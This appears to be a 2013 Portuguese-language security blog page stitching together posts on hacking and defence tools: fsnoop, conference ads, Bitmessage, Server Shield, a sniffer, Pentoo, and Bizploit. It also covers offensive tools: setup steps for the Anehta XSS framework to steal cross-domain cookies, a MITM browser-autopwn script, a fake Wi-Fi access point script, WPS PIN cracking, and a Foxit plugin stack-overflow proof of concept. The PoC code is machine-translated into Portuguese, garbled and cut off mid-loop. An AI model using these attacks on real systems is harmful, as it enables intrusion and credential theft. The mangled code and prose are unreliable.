terça-feira, abril 09, 2013

Fsnoop - monitor file operations

Fsnoop


is a tool to monitor file operations on GNU/Linux systems. Its primary purpose is to detect bad temporary file usages and therefore, file race condition vulnerabilities.

Download

Usage

   $ ./fsnoop --help
   fsnoop monitors file operations by using the Inotify mechanism.
   
   Usage: fsnoop [OPTIONS] [DIR1[,DIR2,...]] [-- COMMAND]
  
     -d            Run as a daemon
     -fd           Open file descriptors when it's possible
     -k            Send SIGSTOP signal to the running process (COMMAND)
     -o filename   Output is redirected to a specific file
     -r            Monitor directory contents recursively
     -t            Prefix each line with the time of day
   
   If no DIR is specified, default writable directories such as /tmp,
   /var/tmp, /dev/shm, etc. are monitored.
  
   If COMMAND is specified, it will monitor activities during the process
   duration.

Output

On events, it displays lines as shown below:
   [C] -rw------- 1 root root 0     Tue May  8 22:17:10 2012 /var/tmp/test
   [M] -rw-r--r-- 1 root root 0     Tue May  8 22:17:10 2012 /var/tmp/test
   [U] -rw-r--r-- 1 root root 1741  Tue May  8 22:17:27 2012 /var/tmp/test
   [M] -rwxrwxrwx 1 root root 1741  Tue May  8 22:17:27 2012 /var/tmp/test
   [D] F /var/tmp/test
An event begins with an action character (placed between brackets):
  • 'C' for Create;
  • 'M' for Modify (means that metadata changed, e.g. permissions, timestamps, link count, UID, GID, etc.);
  • 'U' for Update (means that file content was modified);
  • 'D' for Delete.
And followed by an output similar to the "ls -l" command, or a shortened output (when fsnoop wasn't able to stat() the file). In the shortened output, only the file type information is displayed ('F' for File and 'D' for directory).

Some examples

To monitor activities in the "/etc" and "/tmp" directories:
   # ./fsnoop /etc,/tmp
   Starting fsnoop version 2.0
   [+] monitor /etc
   [+] monitor /tmp
To run Fsnoop as a daemon in order to monitor the "/var/tmp" directory and record activities in the "/root/fsnoop.log" file:
   # ./fsnoop -d -t -o /root/fsnoop.log /var/tmp
   Starting fsnoop version 2.0 
Output log will look like this:
   # cat /root/fsnoop.log
   [+] monitor /var/tmp
   (20:10:00) [C] -rw-r--r-- 1 root root 0  Mon Jul  9 20:10:00 2012 /var/tmp/blurb-lock
   (20:10:00) [M] -rw-r--r-- 1 root root 0  Mon Jul  9 20:10:00 2012 /var/tmp/blurb-lock
   (20:13:02) [D] F /var/tmp/blurb-lock
To monitor file activities just during a process duration:
   $ ./fsnoop /tmp -- Xorg -ac :1
   Starting fsnoop version 2.0
   [+] monitor /tmp
To send the SIGSTOP signal to a process right after an event occurs:
   $ ./fsnoop -k /tmp/.tX1-lock -- Xorg -ac :1
   [...]
   [C] F /tmp/.tX0-lock
   *** PID 30342 stopped, type [Enter] to resume execution:
   *** PID 30342 resumed ...
To read the content of a file that has been erased:
   $ ./fsnoop -fd /var/tmp
   [+] monitor /var/tmp
   [+] As then "-fd" option is being used, you can launch new shell by
       using "ctrl-c" and disclose file descriptors content.
   [C] -rw-r--r-- 1 root root 0  Tue Jan  1 21:39:55 2013 /var/tmp/temp.2oPahVp (opened fd=5)
   [U] -rw-r--r-- 1 root root 13  Tue Jan  1 21:40:37 2013 /var/tmp/temp.2oPahVp
   [D] F /var/tmp/temp.2oPahVp
   ^C
   
   Here are opened file descriptors.  You can display their contents by
   using the "cat" command.  For example, to display fd #4 use: "cat <&4"
   
   lrwx------ 1 vladz vladz 64  1 janv. 21:43 0 -> /dev/pts/3
   lr-x------ 1 vladz vladz 64  1 janv. 21:43 5 -> /var/tmp/temp.2oPahVp (deleted)
   fsnoop$ cat <&5
To monitor directories recursively:
If /tmp is being monitored and someone runs:
   $ mkdir -p /tmp/a/b/c/d/e/f
   $ touch /tmp/a/b/c/d/e/f/a
Event will be caught:
   $ ./fsnoop -r /tmp
   [+] monitor /tmp
   [C] -rw-r--r-- 1 vladz vladz 0  Thu Jan 24 13:10:30 2013 /tmp/a/b/c/d/e/f/a

Credits

Thanks to Larry Cashdollar for testing the tool and bringing new ideas.

Workshop Proposal Submission Deadline ( Security Focus )

Workshop Proposal Submission Deadline: April 15, 2013
------------------------------------------------------------------------
Paper Submission Deadline: June 1, 2013
----------------------------------------------------------------------
Washington D.C. USA, September 8-14, 2013.
http://www.asesite.org/events/washington2013/
-------------------------------------------------------------------------

1.      2013 ASE/IEEE International Conference on Big Data
             http://www.asesite.org/conferences/bigdata/2013/

2.      2013 ASE/IEEE International Conference on Social Computing
             http://www.asesite.org/conferences/socialcom/2013/

3.      2013 ASE/IEEE International Conference on Economic Computing
             http://www.asesite.org/conferences/econcom/2013/

4.      2013 ASE/IEEE International Conference on Biomedical Computing
             http://www.asesite.org/conferences/biomedcom/2013/

5.      2013 ASE/IEEE International Conference on Privacy, Security, Risk and Trust
            http://www.asesite.org/conferences/passat/2013/

EC- Council Conference & Event's




Generic Conference Banner
Thank you so much for your participation in EC-Council's certification programs! We are proud to officially announce our 2012 Schedule of Events! EC-Council events are designed to provide you with the best speakers, cutting edge topics, beginning through advanced hacking courses and of course a ton of Continuing Education credits!

If you haven't already registered, don't hesitate as 2013 will offer more events in more locations than any previous year in EC-Council history!

See you there,  
Eric Lopez, Senior Director, Conference & Events

TDC 2013 St. Louis

TakeDownCon St. Louis 
Hosted by EC-Council and one of our top partners, Parameter Security, this two-day conference will feature a split agenda of Security Briefs followed by "Deep Dive" Hacking Clinics! [Advanced hacking courses such as
"Advanced Mobile Hacking Forensics," will be offered Pre-Conference & include access to the main event!]
more Info

St. Louis CISO Summit  
St. Louis CISO Summit  
Strictly for top Information Security executives, apply to attend this prestigious, invite-only event for a mix of keynotes, panel discussions, networking, and live demos covering the most pressing and relevant IS issues.  More info.  

TDC 2013 Huntsville banner  
Rocket City TakeDownCon 
Hosted by EC-Council and one of our top partners, Dynetics, this two-day conference will feature a day of Defensivee Briefs and a day of Offensive Breifs! [Advanced hacking courses such as "Advanced Metasploit Hacking," will be offered Pre-Conference & include access to the main event!]
more info.

HH 2013 banner   
Hacker Halted
Mark your calendars and check back at this website because in staying with our theme, "The Hacker Code; Angels vs Demons," we will be running a massive scavenger hunt with our vendors, a hacking contest and an onsite treasure hunt which will qualify you to enter into a drawing for the largest CASH giveaway Hacker Halted has ever offered! This year will also host the Global Cyberlympics, Global CISO Forum, and onsite hacking challenge and over 50 amazing presenters, and as always, the best Advanced Hacker courses in the industry!
More info. 

Global CISO Forum 2013    
Global CISO Forum
The biggest CISO conference of the year - don't miss this executive-level, invite-only event including high-level information security program management, networking, and demonstrations. 
More info. 

GCL banner 2013     
Global CyberLympics
The EC-Council Foundation is proud to announce that the Cyberlympics freshman year was a huge success with over 400 teams competing from 52 countries! 2013 is already shaping up to be bigger and more exciting than we have previously thought possible. We will begin our first of three regional "Elimination" rounds in July so if you think you have some hacking skills and can compete with last year's Reigning champions, Deloitte's HHCK.ers from the Netherlands, sign up now to get registered! 
More info

Bitmessage - mensagens criptografadas

Bitmessage é um protocolo de comunicações P2P usado para enviar mensagens criptografadas para outra pessoa ou para muitos assinantes. É descentralizado e indigno de confiança, o que significa que você precisa, não inerentemente confiar quaisquer entidades como autoridades de certificação de raiz. 

Ele usa uma autenticação forte, o que significa que o remetente de uma mensagem não pode ser falsificado, e tem como objetivo esconder "sem conteúdo" de dados, como o emissor eo receptor de mensagens, de bisbilhoteiros passivos como aqueles que executam programas de escutas telefônicas sem mandado. 

Um cliente de código aberto está disponível gratuitamente sob a licença MIT muito liberal. Para imagens e uma descrição do cliente, consulte este artigo CryptoJunky: "configurar e usar Bitmessage"

Download: https://bitmessage.org/wiki/Main_Page 

domingo, janeiro 20, 2013

,

Modelo de relatório sobre Ensaio de Intrusão

Boa Tarde A todos!

- Muitas pessoas me perguntam sobre trabalhar com segurança da informação, que quer implementar IDS, IPS, redes de alta disponibilidade, Quais as vantagens e desvantagens de optar apenas por este Ramo.  Como qualquer outro o caminho é árduo a seguir, certificações e graduações  são preponderantes para se obter sucesso profissional e por que não pessoal ( PNL ) , como já citei em uma postagem anterior.

- Acompanho muito as postagens do Dragonjar, que tem uns 10 anos de experiencia no ramo, e não é apenas por posts "l33tmothafoker hacking oldschool " não, sim pelo que auxilia para comunidade. Achei importante compartilhar um material sobre Modelos de relatórios de analise de intrusão, sem delongas.


Segue:


,

Server Shield - Hardening linux


Protect+your+Linux+server
Features
  • Firewall Hardening
  • TCP Hardening
  • Data Leakage Protection
  • ICMP/Ping Flood Protection
  • Rootkit Protection
  • DoS Protection
  • Spoof Protection
  • Bogus TCP Protection
  • SYN Flood Protection
  • Requires
  • iptables ("yum install iptables")
Installation
git clone https://github.com/Brian-Holt/server-shield
cd server-shield;chmod +x sshield;mv sshield /etc/init.d
/etc/init.d/sshield start 

Download Server Shield v1.0.2
,

Junkie - The Network Sniffer

As the heart of SecurActive network performance monitoring application lies a real-time packet sniffer and analyzer. Modular enough to accomplish many different tasks, we believe this tool can be a helpful companion to the modern network administrator and analyst, and so we decided to offer it to the public under a liberal license so that the Open Source community can use it, play with it, and extend it with whatever feature is deemed appropriate.
Compared to previously available tools junkie lies in between tcpdump and wireshark. Unlike tcpdump, its purpose is to parse protocols of any depth; unlike wireshark, through, junkie is designed to analyze traffic in real-time and so cannot parse traffic as completely as wireshark does.
In addition, junkie's design encompasses extendability and speed:
  • plug-in system + high-level extension language that eases the development and combination of new functionalities;
  • threaded packet capture and analysis for handling of high bandwidth network;
  • modular architecture to ease the addition of any protocol layer;
  • based on libpcap for portability;
  • well tested on professional settings.
Junkie is still being maintained and extended by SecurActive dedicated team but we believe it can be further extended to fulfill many unforeseen purposes.

Todo

Protocol discovery

  • Automatically convert from bro/l7-filter/snort filters to junkie protocol discovery
  • When we found out a proto for TCP (that we know how to parse), register it both ways (using connection tracking hash?)

Netmatch language

  • a type for signed integers (in a way or another - maybe the few operators that really care should exist in two variants?);
  • another special form for converting a name to an ip_addr (or a regular function if we optimize constant away from runtime exec - see below about purity);
  • pure functions taking only constants (and thus returning a constant) should be precomputed;
  • a slice operator to extract a string from another string;
  • it should be correct to match with: (eth) ((ip) (...) or (arp) (...)). in other words, the proto list should be a special form (binding current protos) rather than a fixed preamble.
  • a list of every valid fields (with a docstrings) for better error messages;
  • a higher level language resembling wireshark's, with automatic insertion of set? predicates;

Nettrack language

  • A www plugin to display each netgraph state;
  • rehashable states (once the global hash will be refactored into an incrementaly resized hash)

Reports

A plugin to use the aforementioned FSM executable rules to build report to help classify traffic;

Netflow

Using the above report facility, produce netflow statistics (and stream it).

Minor

  • writer www plugin must mergecap fractionned pcap files for download;
  • automatic resolution of inter-modules dependancies during init;

Parsers for:

,

Anehta V-0.6 - Web Application Security Audit Tool


Anehta é uma ferramenta Web Pedido de Auditoria de Segurança, escrito em PHP / JavaScript projetado para fazer cross site scripting e ataques de outros web mais fácil e automatizado.

Instalar e configurar:
1. Descompactar todos os arquivos de um diretório em seu servidor
2. Verifique se o seu diretório tem a permissão de gravação.
3. Modificar U $ $ como nome de usuário e senha em P como "servidor de classe / / auth_Class.php" arquivo.
Nome de usuário padrão é "admin" ea senha padrão é "123456".
4. Se você quiser enviar e-mails, modificar "servidor / mail.php" arquivo para o seu próprio servidor de email ou caixa de correio.

Início Rápido:
1. Faça login e voltar para a guia Configurar.
2. Introduzir o "anehtaurl" como o endereço onde seu anehta é.
Por exemplo: "http://www.a.com/anehta".
3. Você também deve inserir o src bumerangue e alvo bumerangue.
src bumerangue é normalmente a mesma página onde você coloca seus feed.js é.

Por exemplo: src boomerang talvez: "http://www.b.com/xssed.html?param = ".
alvo bumerangue deve ser a página onde você quer roubar o cookie de domínio cruzado.
Por exemplo: alvo boomerang talvez: "http://www.alimafia.com/xssDemo.html # '> <'".
Você pode modificar feed.js para cancelar o módulo xcookie se você não quiser usar bumerangue. Mas você deve sempre definir valores bumerangue src e alvo quando você modificar na guia de configuração.

4. Depois configure modificado, basta carregar feed.js como um script externo para onde sua página xss é. Há também uma página de demonstração no diretório que é "demo.html"
5. Atualizar a admin.php, e você pode ver algumas mudanças se o seu escravo xss vinda.

Download: 
File:
  anehta-v0.6.0.rar   4.6 MB
Description:
=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS

=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in "server/class/auth_Class.php" file.
   Default username is "admin" and default password is "123456".
4. If you want to send mail, modify "server/mail.php" file to your own mail server or mailbox.

=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the "anehtaurl" as the url where your anehta is.
   For example: "http://www.a.com/anehta".
3. You should also input the boomerang src and boomerang target.
   boomerang src is usually the same page where you put your feed.js is.
   For example: boomerang src maybe: "http://www.b.com/xssed.html?param=".

   boomerang target must be the page where you want to steal cross domain cookie.
   For example: boomerang target maybe: "http://www.alimafia.com/xssDemo.html#'><'".

   You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
   But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
   There is also a demo page in the directory which is "demo.html"

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

=== More Support ===
Home page: http://anehta.googlecode.com
Blog: http://hi.baidu.com/aullik5  (Many Docs here)
Demo Video: http://hi.baidu.com/aullik5/blog/item/cb4cd5899283b093a4c272a9.html

Author: axis@ph4nt0m.org

Feel free to tell me your advise.
SHA1 Checksum:623853b2d834e696b4c264c22ef877ecfa588fbb What's this?

Pentoo - Security Focused Livecd


Pentoo+-+Security+focused+livecd
Pentoo is a security-focused livecd based on Gentoo. It's basically a gentoo install with lots of customized tools, customized kernel, and much more. Here is a non-exhaustive list of the features currently included :
  • Kernel 2.6.31.6 with lzma and aufs patches
  • Wifi stack 2.6.32_rc7
  • Module loading support ala slax
  • Changes saving on usb stick
  • Enlightenment DR17 WM
  • Cuda/OPENCL cracking support with development tools
  • System updates if you got it finally installed
Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman so all you have to do is layman -L and layman -a pentoo.

Bizploit - ERP Penetration Testing framework.


  • Onapsis Bizploit
  •   Bizploit is the first Opensource ERP Penetration Testing framework. Developed by the Onapsis Research Labs, Bizploit assists security professionals in the discovery, exploration, vulnerability assessment and exploitation phases of specialized ERP Penetration Tests.
    Currently, Bizploit is shipped with many plugins to assess the security of SAP business platforms. Plugins for other popular ERPs will be included in the short term.
  • Download Bizploit v1.50-rc1 for Windows
  • Download Bizploit v1.50-rc1 for Linux
,

browser-in-the-middle , I love IT! :D

browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.

File:
  browser_autopwn.sh   1.9 KB
Description:
Not working bash script to test if I can upload files.
SHA1 Checksum:0fe79f78dd385433edb70279306fc4974b9f0c77 What's this?


browser-in-the-middle - Script




Browser-in-the-middle is a bashscript that uses ettercap, metasploit and the beEF framework to make attacks that injects code in pages users visited on the internet from the local network.
- uses ettercap to launch a man in the middle attack
- ettercap modifies traffic so evil javascript or iframes are added
- victim's browser will be redirect to the attackers webserver
- the webserver will be running the msf autopwn module or the beEF framework to launch browserexploits are other browser related attacks.

File:
  browser_autopwn.sh   1.9 KB
Description:
Not working bash script to test if I can upload files.
SHA1 Checksum:0fe79f78dd385433edb70279306fc4974b9f0c77 What's this?
, ,

Wifi - Honey - Criando Ap's falsa (:

Vou deixar a descrição original (: 

This is a script, attack can use to creates fake APs using all encryption and monitors with Airodump. It automate the setup process, it creates five monitor mode interfaces, four are used as APs and the fifth is used for airdump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.
Installing wifi honey
chmod a+x wifi_honey.sh
./wifi_honey.sh fake_wpa_net

./wifi_honey.sh fake_wpa_net 1 waln1
Download Wifi Honey

,

WPSCRACKGUI - Graphical tool for cracking WPS Wireless Pin


changelog v1.2.1 :
* The Portuguese language was added.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
Graphical interface to the network cracking WPS Reaver.
wps_crack_gui1features :
  • Graphic User Interface (GUI) WPS encryption cracking.
  • Advanced Attack with Generic Dictionary.
  • Advanced Dictionary Attack with Enhanced.
  • Updated Assisted Reaver-WPS.
  • Database with PINs.
  • Change MAC Address.
  • Supported in Gt and Gtk.
  • Scan networks.

, ,

Vulnerabilidade crítica no plugin de Foxit PDF para o Firefox

Por algum tempo eu uso o Foxit Reader PDF como padrão leitor, é leve, rápido e usa menos recursos do que o Adobe Reader. Além do malware é continuamente chicotadas Adobe por simples economia de guerra: a maioria dos usuários usá-lo e são mais propensos a se espalhar. Eu posso então? Embutirme no meu roupão, enquanto egged um incêndio chaminé e cantou o slogan " Eu me sinto seguroooo "? Longe disso ... 

A partir do Adobe Reader X é orientado para a área de segurança de segurança e correções aplicadas e aplicada devido a múltiplas vulnerabilidades descobertas por um exército de beta testersdispostos a abrir as portas para seus artefatos maliciosos. Então, talvez o Foxit Reader não é o inimigo público número um, mas isso não significa mais seguro. 

O consultor italiano Andrea Micalizzi, aka rgod , nos lembrou recentemente pela publicação de uma vulnerabilidade que afeta, sim, o plugin do Foxit PDF para o navegador . Ou seja, o erro não está presente no leitor de PDF em si, se não na biblioteca npFoxitReaderPlugin.dll que atua como um intermediário entre o navegador eo Foxit Reader. 

Especificamente, o código é vulnerável a um estouro de pilha no processamento de pedidos de ligações longa . A prova de conceito é claro: agora trabalha na versão mais recente do Firefox (18,0) e da última versão do Foxit Reader (5.4.4.1128) com o seu plugin (2.2.1.530).  
Vamos olhar para código l de rgod:

 <? php * /

Foxit Reader <= Plugin para Firefox 5.4.4.1128 overlong npFoxitReaderPlugin.dll 
Query String remoto Stack Buffer Overflow PoC rgod ---------------------------

(Ouvinte)

Testado contra Microsoft Windows
Mozilla Firefox 17.0.1
Foxit Reader 5.4.3.0920
Foxit Reader 5.4.4.1128

Arquivo: npFoxitReaderPlugin.dll
Versão: 2.2.1.530

Url produto: http://www.foxitsoftware.com/downloads/
Arquivo de instalação última versão: FoxitReader544.11281_enu_Setup.exe

Uso:
Lançamento da linha de comando, em seguida, navegar com o Firefox porta 6666.
Você também pode testá-lo através do site:

http://192.168.0.1/x.pdf? [A x 1024]

Arquivo deve ser existentes ou o servidor deve estar respondendo com
o cabeçalho Content-Type adequada.

código vulnerável, npFoxitReaderPlugin.dll:

, ------------------------------------------------- -----------------------------
 L1000162F:
    empurrar ebx
    empurrar esi
    empurrar edi
    mov edi, ebp
    ou ecx, FFFFFFFFh
    xor eax, eax
    xor ebx, ebx
    esi xor, esi
    REPNE SCASB
    não ecx
    dezembro ecx
    teste ecx, ecx
    jle L100016E4
 L1000164A:
    mov al, [esi + ebp]
    mov word ptr [esp 18 h], 0000h
    cmp al, 25h
    jz L10001661
    mov ecx, [esp Ch 1]
    mov [ebx + ecx], o
    jmp L100016CE
 L10001661:
    mov al, [esi + ebp 01 h]
    cmp al, 30h
    jl L1000166D
    cmp al, 39h
    jle L1000167D
 L1000166D:
    cmp al, 41h
    jl L10001675
    cmp al, 46h
    jle L1000167D
 L10001675:
    cmp al, 61H
    jl L100016C6
    cmp al, 66h
    jg L100016C6
 L1000167D:
    mov dl, [esi + ebp 01 h]
    esi inc
    esi inc
    leia ecx, [esp +10 h]
    mov [esp 18 h], dl
    empurrar ecx
    mov al, [esi + ebp]
    lea edx, [esp Ch 1]
    empurrar L100450D4
    empurrar edx
    mov [esp 25 h], o
    chamar SUB_L10006421
    mov eax, [esp Ch 1]
    leia ecx, [esp 24 h]
    empurrar eax
    empurrar L100450D0
    empurrar ecx
    chamar SUB_L100063CF
    mov eax, [esp 34 h]
    mov dl, [esp 30 h]
    adicionar esp, 00000018h
    mov [ebx + eax], dl
    jmp L100016CE
 L100016C6:
    mov ecx, [esp Ch 1]
    mov byte ptr [ebx + ecx], 25h
 L100016CE:
    inc ebx
    mov edi, ebp
    ou ecx, FFFFFFFFh
    xor eax, eax
    esi inc
    REPNE SCASB
    não ecx
    dezembro ecx
    cmp esi, ecx
    jl L1000164A
 L100016E4:
    mov edx, [esp Ch 1]
    edi pop
    esi pop
    mov eax, 00000001H
    mov byte ptr [ebx + edx], 00h
    pop ebx
    pop ebp
    pop ecx
    retn
, ------------------------------------------------- -----------------------------

copiar este ciclo termina em substituição ponteiros de pilha, em seguida, 
(Ao ligar para plugin-container.exe):

(F48.1778): violação de acesso - código c0000005 (primeira chance)
Exceções de primeira chance são relatados antes de qualquer tratamento de exceção.
Essa exceção pode ser esperado e manipulados.
eax = 00000341 ebx = 0076ed4c 002cf414 edx = ecx = esi = 41414141 edi = 002cf414 0076e9e8
eip = 10016852 esp = 002cf3f8 ebp = iopl = 0 nv up ei pl 75eacdf8 nz nd po nc
cs = 001b ss = 0023 ds = 0023 es = 0023 fs = 003b gs = 0000 efl = 00010202
! npFoxitReaderPlugin NP_GetEntryPoints 0 x15672:
10016852 8906 mov dword ptr [esi], eax ds: 0023:41414141 =????
...
Tentativa de escrever para tratar 41414141
...

Também ponteiros SEH são substituídas
* /

error_reporting ( 0 );

set_time_limit ( 0 );

$ Porta =  6666 ;

____ $ Redirecionar =  "HTTP/1.1 301 Movido Permanentemente \ r \ n" . 
                "Servidor: Apache \ r \ n" . 
                "Localização:? / x.pdf" . str_repeat ( "A" , 1024 .) "\ r \ n " . 
                Content-Type ": text / html \ r \ n \ r \ n" ;

$ ____ Crescimento      =  "HTTP/1.1 200 OK \ r \ n" . 
                "Servidor: Apache \ r \ n" . 
                "Accept-Ranges: bytes \ r \ n" . 
                "Content-Length: 60137 \ r \ n" . 
                " ": Content-Type application / pdf \ r \ n . 
                "Connection: keep-alive \ r \ n \ r \ n" ;

$ Socket = stream_socket_server ( "tcp :/ / 0.0.0.0" . $ port , $ errno , $ errstr );

se  (! $ socket )  { 
  ECHO "$ errstr ($ errno) \ n" ; 
}  mais  { 
  ECHO "escutando na porta TCP público" . $ port . "\ n" ;   
  enquanto  ( $ conn = stream_socket_accept ( $ socket ))  { 
    $ linha = fgets ( $ conn ); 
    senhorita
     
    
     
    
  


Agora, execute o php (x.php no meu exemplo) a partir da linha de comando do nosso Windows 7: 

D : \ xampplite \ htdocs > d : \ xampplite \ php \ php . exe - fx . php
 Ouvir em público a porta TCP 6666 
GET / x . pdf ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HTTP AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/ 1,1
E, finalmente, visam corrigir o endereço e porta no navegador: 
  
  
Como você pode ver, temos causou o acidente do plugin com despeinarnos pouco ...  
Atualmente não há nenhuma atualização para resolvê-lo e outras versões do Foxit Reader e outros navegadores (Firefox, Chrome e Safari) podem ser vulneráveis, por isso é recomendável desabilitar o plugin até novo aviso: 

Para desativar arquivos PDF não será aberto diretamente no navegador e será carregado em um novo processo de Foxit Reader, evitando assim o uso do plugin DLL vulnerável. 

Fonte: vulnerabilidade reportada no Foxit PDF Plugin para o Firefox - como mitigá-la 
Atualização:  18 / 01/2012 : 


fonte: hackplayers.com